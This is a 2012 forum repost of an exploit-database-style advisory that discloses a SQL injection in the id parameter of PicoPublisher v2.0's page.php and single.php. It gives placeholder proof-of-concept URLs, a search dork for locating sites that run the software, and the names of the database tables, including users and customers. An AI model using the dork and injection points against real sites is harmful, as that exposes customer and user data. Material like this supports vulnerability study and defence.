The_Arhitect Posted March 29, 2012 Report Posted March 29, 2012 PicoPublisher v2.0 Remote SQL Injection# Exploit Title : PicoPublisher v2.0 Remote SQL injection# Date : 29/03/2012# Author : ZeTH# Contact : zeth/at/hacktheplan8/dot/com http://www.hacktheplan8.com# Vendor : Pico Software # Site : http://pico.no/# Version : 2.0# Price : $29,00# Dork : intext:"Drives med PicoPublisher"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::--[1]-- IntroductionPicoPublisher business softwarePicoPublisher is a product from Pico Software[Manage your website]PicoPublisher makes it easy to manage your website. With the built in templates you can add columns, slideshows, tabs, boxes and videos directly from the text editor.[Manage your customers]CRM systems are often too expensive for small businesses. With PicoPublisher you can manage your customers just as easy as your website. And at the same place![Create invoices]Create professional PDF invoices in seconds. Add products to the database and insert products to the invoice directly. You will getnotifications when invoices are overdue.--[2]-- VulnerabilityFiles :[+] page.php[+] single.phpAttack Method : Remote SQL injectionPOC :[+] http://site/page.php?id=SQLi[+] http://site/single.php?id=SQLiTables :+-------------------+| customers| expenses| gallery_category| gallery_photos| invoice_reminders| invoices| invoices_product| menu_items| menus| notes| options| orders| orders_product| pages| pico_comments| pico_config| pico_karma_voted| posts| product_list| users+-------------------+--[3]-- Greetzhacktheplan8 [hellcome to new friends kasp3r, Pitung]MainHack Brotherhood, Kecoak Elektronik, Echopacketstormsecurity, exploit-db, 1337dayPaman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo, Furkan, pizzyroot, H312YSursa: PicoPublisher v2.0 Remote SQL Injection Quote
